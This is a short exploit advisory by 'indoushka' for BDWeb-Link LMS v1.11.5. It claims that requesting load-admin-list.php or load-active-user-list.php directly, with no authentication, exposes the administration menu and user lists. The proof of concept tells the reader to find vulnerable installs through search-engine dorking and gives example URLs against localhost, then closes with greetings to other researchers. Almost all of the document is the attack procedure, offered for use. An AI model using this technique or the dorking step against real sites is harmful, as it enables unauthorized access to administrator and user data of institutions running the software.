====================================================================================================================================
| # Title     : BDWeb-Link Lms v1.11.5 Unauthorized administrative access Vulnerability                                            |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit)                                              | 
| # Vendor    : https://bdweblink.com                                                                                              |  
| # Dork      : Developed by Developed by BD Web Link                                                                              |
====================================================================================================================================

poc :


[+] Dorking İn Google Or Other Search Enggine.

[+] Use the payload to access the control panel and see the administration menu : load-admin-list.php or load-active-user-list.php

[+] https://127.0.0.1/bdweblink/load-active-user-list.php or https://127.0.0.1/bdweblink/load-admin-list.php


Greetings to :=========================================================================================================================
                                                                                                                                      |
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |        
                                                                                                                                      |
=======================================================================================================================================